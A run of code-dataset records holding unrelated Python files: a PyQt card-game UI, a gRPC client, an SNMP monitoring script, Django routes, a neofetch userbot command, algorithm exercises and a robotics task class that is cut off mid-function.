Qt.DisplayRole or role == Qt.EditRole:\r\n return str(self.__data[index.row()][index.column()])\r\n \r\n return None\r\n \r\n def addGame(self, server, game_list):\r\n self.beginInsertRows(QModelIndex(), 0, 0)\r\n for key in game_list:\r\n self.__data.append((server, game_list[key]))\r\n self.endInsertRows()\r\n \r\n \r\n \r\nclass SearchGamePage(NavigationPage):\r\n '''\r\n SearchGamePage\r\n '''\r\n\r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(SearchGamePage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_SearchGamePage()\r\n self.ui.setupUi(self)\r\n\r\n self.__progress = QMovie(\":/icons/progress.gif\")\r\n self.__server_finder = PyDurakServerFinder(55560)\r\n self.__server_finder.started.connect(self.__searchStarted)\r\n self.__server_finder.stopped.connect(self.__searchStopped)\r\n self.__server_finder.found.connect(self.__serverFound)\r\n \r\n self.ui.gameTableView.setModel(GameListModel())\r\n \r\n @pyqtSlot()\r\n def __searchStarted(self):\r\n self.ui.searchBtn.setEnabled(False)\r\n self.ui.progressLabel.setMovie(self.__progress)\r\n self.__progress.start()\r\n \r\n @pyqtSlot()\r\n def __searchStopped(self):\r\n self.ui.searchBtn.setEnabled(True)\r\n self.__progress.stop()\r\n self.ui.progressLabel.clear()\r\n \r\n @pyqtSlot(str, dict)\r\n def __serverFound(self, server, game_list):\r\n print(\"Server found:\", server, game_list)\r\n self.ui.gameTableView.model().addGame(server, game_list)\r\n self.ui.gameTableView.update()\r\n \r\n @pyqtSlot()\r\n def searchNetGames(self):\r\n self.__server_finder.start()\r\n \r\n def initContent(self):\r\n self.ui.joinBtn.setEnabled(False)\r\n \r\n def resetContent(self):\r\n self.__server_finder.stop()\r\n self.ui.progressLabel.clear()\r\n \r\n \r\n \r\nclass SettingsPage(NavigationPage):\r\n '''\r\n SettingsPage\r\n '''\r\n\r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(SettingsPage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_SettingsPage()\r\n self.ui.setupUi(self)\r\n \r\n self.__addPages()\r\n \r\n def __addPages(self): \r\n profilePage = ProfileSettingsPage()\r\n profilePage.setIcon(QIcon(\":/icons/personal.png\"))\r\n self.ui.pageWidget.addPage(profilePage)\r\n \r\n def resetContent(self):\r\n self.ui.pageWidget.reset()\r\n \r\n @pyqtSlot()\r\n def apply(self):\r\n try:\r\n self.ui.pageWidget.apply()\r\n clientsettings.saveAll()\n except:\r\n msgBox = QMessageBox()\r\n msgBox.setWindowIcon(QIcon(\":/icons/bug.png\"))\r\n msgBox.setWindowTitle(\"Fehler\") \r\n msgBox.setText(\"Ein Fehler beim Speichern der Einstellungen ist aufgetreten.\") \r\n msgBox.setStandardButtons(QMessageBox.Ok)\r\n msgBox.setDefaultButton(QMessageBox.Ok)\r\n msgBox.setIcon(QMessageBox.Critical)\r\n msgBox.exec_()\r\n \r\n self.navigateBack()\r\n\r\n\r\n\r\n \r\nclass MainMenuPage(NavigationPage):\r\n '''\r\n MainMenuPage\r\n '''\r\n \r\n def __init__(self, pageId, parent):\r\n '''\r\n Constructor\r\n '''\r\n super(MainMenuPage, self).__init__(pageId, parent)\r\n \r\n self.ui = Ui_MainMenuPage()\r\n self.ui.setupUi(self)\r\n \r\n self.__addChildren()\r\n\r\n def __addChildren(self):\r\n self.addChild(GamePage(\"newSinglePlayerGame\", self))\r\n self.addChild(GamePage(\"newNetGame\", self)) \r\n self.addChild(SearchGamePage(\"searchNetGame\", self))\r\n self.addChild(SettingsPage(\"settings\", self))\r\n \r\n @pyqtSlot()\r\n def quitGame(self):\r\n reply = QMessageBox.question(self, \r\n \"Spiel verlassen\", \r\n \"PyDurak wirklich beenden?\", \r\n QMessageBox.Yes | QMessageBox.No,\r\n QMessageBox.No)\r\n # TODO own navigation page?\r\n\r\n if reply == QMessageBox.Yes:\r\n qApp.quit()\r\n \r\n @pyqtSlot()\r\n def showSettingsPage(self):\r\n NavigationPage.navigate(self, \"settings\")\r\n \r\n @pyqtSlot()\r\n def showSearchNetGamePage(self):\r\n NavigationPage.navigate(self, \"searchNetGame\")\r\n \r\n @pyqtSlot() \r\n def showNewNetGamePage(self):\r\n NavigationPage.navigate(self, \"newNetGame\")\r\n \r\n @pyqtSlot()\r\n def showNewGamePage(self):\r\n NavigationPage.navigate(self, \"newSinglePlayerGame\")","sub_path":"pydurak/client/ui/navigation_pages.py","file_name":"navigation_pages.py","file_ext":"py","file_size_in_byte":6905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"620155351","text":"\"\"\"\r\nProject: ID Database - Add User\r\nVersion: V1.0\r\nAuthor: Josh Cooper\r\nBrief: A system that displays information, Based on their unique ID number.\r\n\"\"\"\r\n\r\n#Asks the user who they want to add.\r\nnewName = str(input(\"Who would you like to add to the database: \"))\r\n\r\n#Opens the SUPER COOL DATABASE!\r\nscdb = open(\"scdb.txt\", \"a\")\r\n\r\n#Writes the new entry to SCDB\r\nscdb.write(\"\\n\")\r\nscdb.write(newName)\r\n\r\n#Stop and save.\r\nscdb.close()","sub_path":"idDatabase-V1/addUser.py","file_name":"addUser.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"302779871","text":"# Copyright (c) 2021 TriggerMesh Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"TriggerMesh Eventstore client.\n\nEventStore is an interface for storing ephemeral data in an event flow.\n\nUsage:\n\nc = client.new(\"localhost:8080\")\nkv = c.new_kv()\nkv.set(\"foo\", str.encode(\"bar\"), ttl=180)\nprint(kv.get(\"foo\"))\n\"\"\"\n\nimport os\nimport grpc\n\nimport eventstore_pb2\n\nfrom eventstore_kv import KV\nfrom eventstore_map import Map\nfrom eventstore_queue import Queue\n\nclass Client:\n \"\"\"Client is a parent class of this module.\"\"\"\n def __init__(self, server):\n self.channel = grpc.insecure_channel(server)\n\n def new_kv(self, **kwargs):\n ttl = kwargs.get(\"ttl\", None)\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return KV(self, scope, ttl, lock_key)\n\n def new_map(self, key, **kwargs):\n ttl = kwargs.get(\"ttl\", None)\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return Map(self, key, scope, ttl, lock_key)\n\n def new_queue(self, key, **kwargs):\n lock_key = kwargs.get(\"lock_key\", None)\n scope = self._define_scope(**kwargs)\n return Queue(self, key, scope, lock_key)\n\n def close(self):\n return self.channel.close()\n\n def _define_scope(self, **kwargs):\n bridge = kwargs.get(\"bridge\", None)\n instance = kwargs.get(\"instance\", None)\n\n typ = eventstore_pb2.Instance\n if bridge is None and instance is None:\n typ = eventstore_pb2.Global\n elif bridge is not None and instance is None:\n typ = eventstore_pb2.Bridge\n return eventstore_pb2.ScopeType(\n type = typ,\n bridge = bridge,\n instance = instance\n )\n\ndef new(*args):\n server = os.environ.get(\"EVENTSTORE_URI\")\n if len(args) != 0:\n server = args[0]\n return Client(server)\n","sub_path":"eventstore/eventstore_client.py","file_name":"eventstore_client.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395665659","text":"from .meta import extractor, from_json\nfrom .batch_iter_factory import BatchIterFactoryFin, BatchIterFactoryInf\nfrom .transformers import segm_prob2msegm\n\nname2batch_iter_factory = {\n 'fin': BatchIterFactoryFin,\n 'inf': BatchIterFactoryInf\n}\n\n\nname2meta = {\n 'extractor': extractor,\n 'from_json': from_json\n}\n\n\nname2transform = {\n 'segm_prob2msegm': segm_prob2msegm\n}\n","sub_path":"dpipe/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"244338730","text":"# 多线程的学习:\n# 单线程执行任务\nimport time\nimport threading\n# 导入线程池\nfrom concurrent.futures import ThreadPoolExecutor\n\npeople = ['zs', 'lsi', 'wangw', 'zhaoliu', 'wangermazi']\n\n\n# 任务一:\ndef fist_methd(people):\n for ps in people:\n print(\"hello \" + ps + \". are you ok?\")\n time.sleep(0.5)\n\n\n# 任务二:\ndef senc_methd(people):\n i = 1\n for ps in people:\n print(\"客户:{},你的id是 {}.\".format(ps, i))\n i += 1\n time.sleep(0.5)\n\n\nt = time.time()\n# 单线程调用\n# fist_methd(people)\n# senc_methd(people)\n# 多线程调用\n# t1=threading.Thread(target=fist_methd,args=(people,))\n# t2=threading.Thread(target=senc_methd,args=(people,))\n# t1.start()\n# t2.start()\n# t1.join()\n# t2.join()\n# 上面的调用很好,但是,需要控制线程的创建销毁,交给线程池最好\n# 使用线程池\n# 初始化2个线程池\nexecutor = ThreadPoolExecutor(max_workers=5)\ntask1 = executor.submit(fist_methd(people))\ntask2 = executor.submit(senc_methd(people))\nprint(\"程序运行的总时长为\" + str(time.time() - t))\n","sub_path":"01improve/11多线程.py","file_name":"11多线程.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"495494282","text":"import sys\n\nif __name__=='__main__':\n if(len(sys.argv)<3):\n print(\"USAGE: python \" + sys.argv[0] + \" boundaryFile Dir\")\n exit(1)\n boundaryFile = sys.argv[1]\n fileDir = sys.argv[2]\n \n boundaryLine = open(boundaryFile).readlines()\n for line in boundaryLine:\n if '[' in line:\n fields = line.strip().split()\n file_id = fields[0];\n file_name = fileDir + file_id + \".bnd_wsj\";\n fid=open(file_name, \"w\")\n boundary = fields[3];\n fid.writelines(boundary + \" \")\n else:\n fields = line.strip().split()\n boundary = fields[1];\n fid.writelines(boundary + \" \")\n\n if ']' in line:\n fid.close()\n continue\n\n","sub_path":"script/phn2bnd_new.py","file_name":"phn2bnd_new.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484101146","text":"#!/usr/bin/python3\nimport os, time, signal\nfrom random import random\n# PySNMP High Level API. Commands: bulkCmd, getCmd, nextCmd and setCmd\nfrom pysnmp.hlapi import *\n# Data types used by PySNMP\nfrom pyasn1.type.univ import * \n# Multithreading\nimport threading\n# SNMP getter functions\nfrom snmpfun import *\n\n# Path to the config file\nCFG_FILE_PATH = '/etc/scripts/agent_list.conf'\n\n# Port\nSNMP_PORT = 161 \n\n# Path to the monitoring data\nSNMP_LOG_PATH = '/etc/monitoring'\n\n# SNMPv3 user\nSNMPv3_USER = { \n 'userName': 'arthur', \n 'authProtocol': usmHMACSHAAuthProtocol, # SHA (128bit)\n 'authKey': 'password',\n 'privKey': 'secret_key',\n 'privProtocol': usmAesCfb128Protocol # AES (128bit)\n }\n\n# Monitoring parameters\nTIME_INTERVAL = 300 \nTIME_WAIT_VALUE = 330\n\n# Save logs in .txt file\nSAVE_TXT = True\n\n\nclass FunctionThread(threading.Thread):\n \"\"\"A thread that runs a function with its arguments\"\"\"\n def __init__(self, function, *args):\n threading.Thread.__init__(self)\n self._function = function\n self._args = args\n \n def run(self):\n self._function(*self._args)\n\nclass MonitoringExit(Exception):\n \"\"\"Custom exception that is thrown when stopping monitoring\"\"\"\n pass\n\ndef monitoring_shutdown(signum, frame):\n \"\"\"Signal handler function\"\"\"\n raise MonitoringExit\n\ndef agent_monitor(stop_event, ips, snmp_port, db_directory, time_interval, snmpv3_user, data_collect_funs):\n \"\"\"Monitors an agent by regularly sending snmp get requests\"\"\"\n stop_event.wait(180)\n # Instantiate SNMP engine\n snmp_engine = SnmpEngine()\n\n # Instantiate user - SNMPv3\n user = UsmUserData(**snmpv3_user)\n\n # Instantiate transport protocol (UDP over IPv6)\n upd_targets = [Udp6TransportTarget((ip, snmp_port), timeout=2) for ip in ips] \n\n while not stop_event.is_set():\n for data_collect_fun in data_collect_funs:\n data_collect_fun(snmp_engine, user, upd_targets, db_directory, txt_backup=SAVE_TXT)\n # Wait before getting next data\n stop_event.wait(time_interval) \n\ndef main():\n threads = []\n stop_event = threading.Event()\n\n # Set signals handlers\n signal.signal(signal.SIGTERM, monitoring_shutdown)\n signal.signal(signal.SIGINT, monitoring_shutdown)\n\n # Initiate monitoring threads\n with open(CFG_FILE_PATH, 'r') as f:\n for line in f:\n agent_name, *agent_ips = line.split()\n db_directory = os.path.join(SNMP_LOG_PATH, agent_name)\n # Create DB directory\n if not os.path.exists(db_directory):\n os.makedirs(db_directory)\n # Initialize databases\n initialize_ram_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n initialize_cpu_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n initialize_ip_info_db(db_directory, TIME_INTERVAL, TIME_WAIT_VALUE, txt_backup=SAVE_TXT)\n # Monitored items\n monitored_items = [ip_info, ram_info, cpu_info]\n # Add thread to list of threads\n threads.append(FunctionThread(agent_monitor, stop_event, agent_ips, SNMP_PORT, db_directory, TIME_INTERVAL, SNMPv3_USER, monitored_items))\n \n try:\n # Start each thread\n for th in threads:\n th.start()\n # Keep this thread active, in order to cleanly stop each thread\n while True:\n time.sleep(1)\n\n except MonitoringExit:\n # Stop each thread\n stop_event.set()\n for th in threads:\n th.join()\n\nmain()\n","sub_path":"scripts/agentmonitor.py","file_name":"agentmonitor.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"532815062","text":"from __future__ import print_function\nimport logging\n\nimport sys\n\nimport grpc\n\nimport flagging_pb2\nimport flagging_pb2_grpc\n\n\ndef runUserSubmit(uid, hk):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.UserSubmit(flagging_pb2.UserSubmitRequest(userId = uid, hashKey = hk))\n result = {\n 'rejected': response.rejected,\n 'existed': response.existed\n }\n return result\n\n\ndef runUserRequest(uid):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.UserRequest(flagging_pb2.UserRequestRequest(userId = uid))\n return response.unflaggedHash\n\n\ndef runAdminSubmit(hk):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.AdminSubmit(flagging_pb2.AdminSubmitRequest(hashKey = hk))\n result = {}\n ##create the output dictionary hash is the key, flag is the value\n for h, f in zip(response.hashKeyList, response.flaggedList):\n result[h] = f\n return result\n\ndef runAdminRequest(uid):\n with grpc.insecure_channel('0.0.0.0:50051') as channel:\n stub = flagging_pb2_grpc.PhotoFlaggingStub(channel)\n response = stub.AdminRequest(flagging_pb2.AdminRequestRequest(userId = uid))\n result = {}\n ##create the output dictionary hash is the key, flag is the value\n for h, f in zip(response.hashKeyList, response.flaggedList):\n result[h] = f\n return result\n\n\n\n\n\"\"\"\n##only for testing purpose\nif __name__ == '__main__':\n logging.basicConfig()\n \n ##command line input\n cli = ''\n\n ##hashed result\n hr = ''\n\n while cli != 'quit':\n cli = str(input('enter a string that you want to hash or quit: '))\n if (cli != 'quit'):\n hr = run_hashing(cli)\n print(\"result: \" + hr)\n\"\"\"\n\n\n","sub_path":"grpc/Storage_service/flagging_client.py","file_name":"flagging_client.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"605132196","text":"from django.urls import path\n\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('store/', views.store_page, name = 'store_page'),\n path('Ordering/', views.flintordercatch, name = 'flintordercatch'),\n path('product//', views.product_page, name = 'product_page'),\n path('FlintCart///', views.addtoFlintCart, name='addtoFlintCart'),\n path('FlintCart/', views.FlintCart_view, name='FlintCart_view'),\n path('DeleteFlintCart//', views.delete_from_FlintCart, name='delete_from_FlintCart'),\n path('UpdateFlintCart/', views.calculate_FlintCart, name='calculate_FlintCart'),\n path('ClearFlintCart//', views.clear_whole_FlintCart, name='clear_whole_FlintCart'),\n path('checkout//', views.checkout, name = 'checkout'),\n\n]","sub_path":"Flintwood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"177847320","text":"from afs.exceptions.UbikError import UbikError\nfrom afs.dao.BaseDAO import BaseDAO,execwrapper\nfrom afs.util import afsutil\nimport UbikPeerDAO_parse as PM\n\n\nclass UbikPeerDAO(BaseDAO):\n \n \"\"\"\n udebug \n \"\"\"\n \n def __init__(self) :\n BaseDAO.__init__(self)\n return\n \n @execwrapper \n def getLongInfo(self,name_or_ip,port,_cfg=None) : \n \"\"\"\n return dict containing all info from a udebug -long\n \"\"\"\n CmdList=[_cfg.binaries[\"udebug\"],\"-server\", \"%s\" % name_or_ip, \"-port\", \"%s\" % port, \"-long\"]\n return CmdList,PM.parse_getLongInfo\n \n @execwrapper \n def getShortInfo(self,name_or_ip,port,_cfg=None) :\n \"\"\"\n return dict containing all info from a simple udebug\n \"\"\" \n CmdList=[_cfg.binaries[\"udebug\"],\"-server\", \"%s\" % name_or_ip, \"-port\", \"%s\" % port, \"-long\"]\n rc,output,outerr=self.execute(CmdList) \n if rc :\n raise UbikError(rc)\n return CmdList,PM.parse_getShortInfo\n\n","sub_path":"afs/dao/UbikPeerDAO.py","file_name":"UbikPeerDAO.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84334641","text":"from asyncio.subprocess import create_subprocess_shell as asyncrunapp, PIPE as asyncPIPE\n\nfrom ..help import add_help_item\nfrom userbot.events import register\n\n\n@register(outgoing=True, pattern=r\"^\\.sysd$\")\nasync def sysdetails(sysd):\n \"\"\" For .sysd command, get system info using neofetch. \"\"\"\n if not sysd.text[0].isalpha() and sysd.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n try:\n neo = \"neofetch --stdout\"\n fetch = await asyncrunapp(\n neo,\n stdout=asyncPIPE,\n stderr=asyncPIPE,\n )\n\n stdout, stderr = await fetch.communicate()\n result = str(stdout.decode().strip()) \\\n + str(stderr.decode().strip())\n\n await sysd.edit(\"`\" + result + \"`\")\n except FileNotFoundError:\n await sysd.edit(\"Please install neofetch before using this\", delete_in=3)\n\nadd_help_item(\n \".sysd\",\n \"Misc\",\n \"Gets system information using neofetch.\",\n \"`.sysd`\"\n)\n","sub_path":"userbot/modules/misc/sysd.py","file_name":"sysd.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"66856598","text":"'''\n풀이 1 - 이진 탐색 트리는 아니지만 계산 결과를 층으로 나누어 누적합 계산하기\n- 질문 게시판 참고했습니다;\n- 현재 레이어(배열)에 존재하는 값에 다음에 오는 숫자를 더하고 빼서 추가\n- 예 : numbers = [1, 2, 3] \n 1\n 1+2 1-2 \n 1+2+3 1+2-3 1-2+3 1-2-3\n- 다음 레이어에 있는 원소 개수는 이전 레이어의 원소 개수보다 2배씩 증가함\n- 최종 레이어에 존재하는 값에서 원하는 target이 있는지 여부를 카운트하기\n\n'''\n\ndef solution(numbers, target):\n\n answer = 0\n curr_layer = []\n\n for idx in range(len(numbers)):\n \n next_layer = []\n next_num = numbers[idx]\n if idx == 0:\n curr_layer.append(numbers[idx])\n curr_layer.append(-numbers[idx])\n else:\n for curr_num in curr_layer:\n next_layer.append(curr_num + next_num)\n next_layer.append(curr_num - next_num)\n\n curr_layer = next_layer\n \n answer = curr_layer.count(target)\n\n return answer\n\n'''\n풀이 2 - 이진트리 생성 후 dfs 수행(실패)\n...결과를 보니 뭔가 이상함\n'''\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\nclass BinaryTree():\n def __init__(self, root):\n self.root = root\n \n def insert(self, val):\n self.root = self._insert_val(self.root, val)\n return self.root is not None\n\n def _insert_val(self, node, data):\n if node is None:\n node = Node(data)\n else:\n node.left = self._insert_val(node.left, data)\n node.right = self._insert_val(node.right, (-1)*data)\n \n return node\n\n \n global nums\n nums = []\n \n def preorder(self, n):\n if n != None: \n nums.append(n.data)\n if n.left:\n self.preorder(n.left)\n if n.right:\n self.preorder(n.right)\n\n\n\n\ndef solution(numbers, target):\n \n tree=BinaryTree(Node(0))\n\n for num in numbers:\n tree.insert(num)\n \n tree.preorder(tree.root)\n\n len_n = len(numbers)\n answer = 0\n\n for i in range(1, len(nums) - len_n, len_n):\n print(nums[i:i+len_n])\n if sum(nums[i:i+len_n]) == target:\n answer += 1\n \n print(len(nums))\n return answer\n\n'''\n","sub_path":"JYP/Programmers_test_kit/target_number.py","file_name":"target_number.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"478866687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 28 09:42:16 2019\n\n@author: student\n\"\"\"\n\nfrom example.gisa import gisa_test\nfile = open('./data/Abc1115.txt')\nlines = file.readlines()\nfile.close()\n#print(lines[0:5])\ntest = gisa_test.GisaTest(lines)\n\nr1 = test.solve_1()\nprint(r1)\nr2 = test.solve_2()\nprint(r2) \nr3 = test.solve_3()\nprint(r3)\nr4 = test.solve_4()\nprint(r4)\n\noutput = open('./data/answers.txt','w')\noutput.write(\"{}\\n\".format(r1))\noutput.write(\"{}\\n\".format(r2))\noutput.write(\"{}\\n\".format(r3))\noutput.write(\"{}\\n\".format(r4))\noutput.close()\n\n\n'''\nsample = test.students[0:10]\nfor s in sample:\n #print(s)\n pass\n\ncount = 0\ntot = 0\nfor stu in test.students:\n if stu.data3 > 0:\n count += 1\n tot += stu.data3\n print(stu)\n pass\n pass\n\nprint(count,tot)\n'''","sub_path":"김정호강사님_spyder/my_project/gisa.py","file_name":"gisa.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"12176857","text":"# coding=utf-8\n# Copyright 2020 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Base Task class.\"\"\"\n\nimport collections\nimport os\nimport random\nimport string\n\nimport cv2\nimport numpy as np\nimport pybullet as p\n\nfrom ravens import cameras\nfrom ravens import tasks\nfrom ravens import utils\n\nimport scipy\nfrom scipy.spatial import ConvexHull\n\n# A pose + threshold to gracefully handle failure cases in bag tasks.\nIDENTITY = {\n 'pose0': ((0.3, 0, 0.3), (0, 0, 0, 1)),\n 'pose1': ((0.3, 0, 0.3), (0, 0, 0, 1))\n}\nBEAD_THRESH = 0.33\n\n\nclass Task():\n \"\"\"Base Task class.\"\"\"\n\n def __init__(self):\n self.mode = 'train'\n\n # Evaluation epsilons (for pose evaluation metric).\n self.position_eps = 0.01\n self.rotation_eps = np.deg2rad(15)\n\n # Workspace bounds.\n self.pixel_size = 0.003125\n self.camera_config = cameras.RealSenseD415.CONFIG\n self.bounds = np.array([[0.25, 0.75], [-0.5, 0.5], [0, 0.28]])\n\n # Only True for goal-based tasks, IF testing (affects ground-truth labels).\n self.goal_cond_testing = False\n\n # (For bag tasks) If taken identiy action, exit gracefully.\n self.exit_gracefully = False\n\n #-------------------------------------------------------------------------\n # Oracle Implementation\n #-------------------------------------------------------------------------\n\n def oracle(self, env):\n \"\"\"Oracle Implementation.\"\"\"\n OracleAgent = collections.namedtuple('OracleAgent', ['act'])\n\n def act(obs, info):\n \"\"\"Calculate action.\"\"\"\n del info\n\n act = {'camera_config': self.camera_config, 'primitive': None}\n if not obs or self.done():\n return act\n\n # Oracle uses ground truth object segmentation masks.\n colormap, heightmap, object_mask = self.get_object_masks(env)\n\n # First, for any custom envs w/pick-place, handle those first.\n if (isinstance(self, tasks.names['cable-ring']) or\n isinstance(self, tasks.names['cable-ring-notarget'])):\n # ------------------------------------------------------------ #\n # Instead of assigning fixed target zones, pick the closest\n # circle to target mapping, then correct for the largest\n # discrepancy. Upon inspection, I think we could fine-tune this\n # a bit more by avoiding any pull that makes the bead cross\n # over itself. Not sure how to precisely do that.\n # ------------------------------------------------------------ #\n vert_pos_l = []\n for bead_id in self.cable_bead_ids:\n bead_position = p.getBasePositionAndOrientation(bead_id)[0]\n vert_pos_l.append(bead_position)\n vertpos_xyz_np = np.array(vert_pos_l)\n\n targets_l = []\n for bead_id in self.goal['places']:\n target_position, _ = self.goal['places'][bead_id]\n targets_l.append(target_position)\n targets_xyz_np = np.array(targets_l)\n\n assert vertpos_xyz_np.shape == targets_xyz_np.shape\n nb_maps = len(self.cable_bead_ids)\n min_dist = np.float('inf')\n vertex_pos, target_pos = None, None\n\n # Different (but 'rotationally consistent') ordering of beads.\n for a in range(nb_maps * 2):\n if a < nb_maps:\n # mapping = [a, a+1, ..., nb_maps-1, 0, 1, ..., a-1]\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n else:\n # Same as above but reverse it (to handle flipped ring).\n a -= nb_maps\n mapping = list(range(a, nb_maps)) + list(range(0, a))\n mapping = mapping[::-1]\n differences = targets_xyz_np - vertpos_xyz_np[mapping]\n distances = np.linalg.norm(differences, axis=1)\n average_distance = np.mean(distances)\n\n if average_distance < min_dist:\n # Index of the largest distance among vertex + target.\n max_idx = np.argmax(distances)\n vertex_pos = vertpos_xyz_np[mapping][max_idx]\n target_pos = targets_xyz_np[max_idx]\n min_dist = average_distance\n\n overshoot = 0.0\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif (isinstance(self, tasks.names['cloth-flat']) or\n isinstance(self, tasks.names['cloth-flat-notarget'])):\n # ------------------------------------------------------------ #\n # The cloth is always in the same side up, so we assume a\n # clockwise ordering of cloth corners to zone corners. The\n # first action should grip the cloth corner closest to the zone\n # and pull it to the furthest zone corner.\n # ------------------------------------------------------------ #\n mappings = [\n [0, 1, 2, 3],\n [3, 0, 1, 2],\n [2, 3, 0, 1],\n [1, 2, 3, 0],\n ]\n\n # Get cloth mesh data and info about cloth/zone corners.\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n corner_idx_np = np.array(self.corner_indices)\n targets_xy_np = self.corner_targets_xy\n vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n min_dist = np.float('inf')\n min_std = np.float('inf')\n vertex_pos = None\n target_pos = None\n\n # Iterate through corner assignments.\n for mapping in mappings:\n corners = corner_idx_np[mapping]\n differences = targets_xy_np - vertpos_xy_np[corners]\n distances = np.linalg.norm(differences, axis=1)\n avg_dist = np.min(distances)\n avg_std = np.std(distances)\n\n if (self.t == 0) and (avg_std <= min_std):\n # Pick cloth corner closest to _zone_ center.\n min_std = avg_std\n zone_xy = np.array(self.zone_pose[0][:2]).reshape(1, 2)\n differences = zone_xy - vertpos_xy_np[corners]\n distances = np.linalg.norm(differences, axis=1)\n idx = np.argmin(distances)\n vertex_pos = vertpos_xy_np[corners][idx]\n target_pos = targets_xy_np[idx]\n elif (self.t != 0) and (avg_dist <= min_dist):\n # Otherwise, consider largest discrepancy in match.\n min_dist = avg_dist\n idx = np.argmax(distances)\n vertex_pos = vertpos_xy_np[corners][idx]\n target_pos = targets_xy_np[idx]\n else:\n # If the above don't apply, DON'T update positions.\n pass\n self.t += 1\n\n # Currently overshooting slightly due to cloth physics.\n overshoot = 0.03\n act['params'] = self.params_no_rots(vertex_pos, target_pos, overshoot)\n\n elif isinstance(self, tasks.names['cloth-cover']):\n # ------------------------------------------------------------ #\n # Put item on the center of the cloth, then pick and pull cloth\n # so it covers it against a triangular folds. Asusmes one cube\n # to be inserted onto cloth (and that action always succeeds).\n # ------------------------------------------------------------ #\n assert len(self.block_ids) == 1 # For now\n\n # Get cloth mesh data and info about cloth/zone corners.\n _, vert_pos_l = p.getMeshData(bodyUniqueId=self.cloth_id)\n corner_idx_np = np.array(self.corner_indices)\n vertpos_xy_np = np.array(vert_pos_l)[:, :2]\n cloth_center_xy = np.mean(vertpos_xy_np[corner_idx_np], axis=0)\n\n # Compute task stage. TODO this is a really bad hack.\n if self.t > 0:\n self.task_stage = 2\n self.t += 1\n\n if self.task_stage == 1:\n # Put a cube on the center of the cloth.\n block_id = self.block_ids[0]\n vertex_pos = p.getBasePositionAndOrientation(block_id)[0]\n target_pos = cloth_center_xy\n overshoot = 0.0\n\n elif self.task_stage == 2:\n # Fold the cloth. Must pick one of the four directions.\n direction = np.random.randint(4)\n if direction == 0:\n source = corner_idx_np[0]\n target = corner_idx_np[2]\n elif direction == 1:\n source = corner_idx_np[1]\n target = corner_idx_np[3]\n elif direction == 2:\n source = corner_idx_np[2]\n target = corner_idx_np[0]\n 